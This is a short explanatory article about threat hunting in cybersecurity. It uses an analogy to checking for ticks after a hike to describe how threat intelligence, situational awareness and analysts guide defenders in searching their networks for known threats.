Let’s start by understanding what threat hunting is: It’s a process of looking — line by line and event by event — for indicators of very specific threats. It’s not a question of looking for what might be an anomaly. It’s the act of detecting indicators of things we know to be happening. It’s like checking for ticks after you’ve been walking through the woods. If you have good reason to believe that there are ticks in the woods, you check to see if any have hitched a ride. The benefit of hunting for them is that you can find and get rid of them before they bite you and make you sick.
That said, as a precursor to threat hunting, you need to have an idea of what you’re looking for. That requires three things: analytics, situational awareness and intelligence. The raw information may come from many different sources, and the experts on a threat hunting team can analyze this information and derive meaning from it. What is the chatter on the dark web? Is anyone talking about targeting a particular company or technology? Are there discussions of new tradecraft or exploit methodologies?
The threat analysts on the threat hunting team may gather large amounts of raw intelligence, and that’s where situational awareness helps identify which issues are salient for different organizations and users. Information identifying a mode of attack against a movie studio, for example, may be of less immediate concern to an automobile manufacturer. The techniques used in an attack on a studio might be viable as techniques for attacking an automobile manufacturer, but if the intelligence suggests that the focus of the attack is local to movie studios, then the IT teams at the automobile manufacturers should stay focused on the threats that are aimed at them. It gets back to that walk in the woods: If ticks are an issue in the woods where you hike but scorpions are not, then you need to be concerned about ticks, not scorpions.
Once the threat analysts identify the threats of concern, the threat hunters can begin their hunt. They may be looking for evidence of specific vulnerabilities — an improperly configured router, for example — or they may be looking for specific code fragments or scripts embedded in their network. And if they find the elements for which they are hunting, they can undertake the actions that are appropriate and protect the enterprise from attack.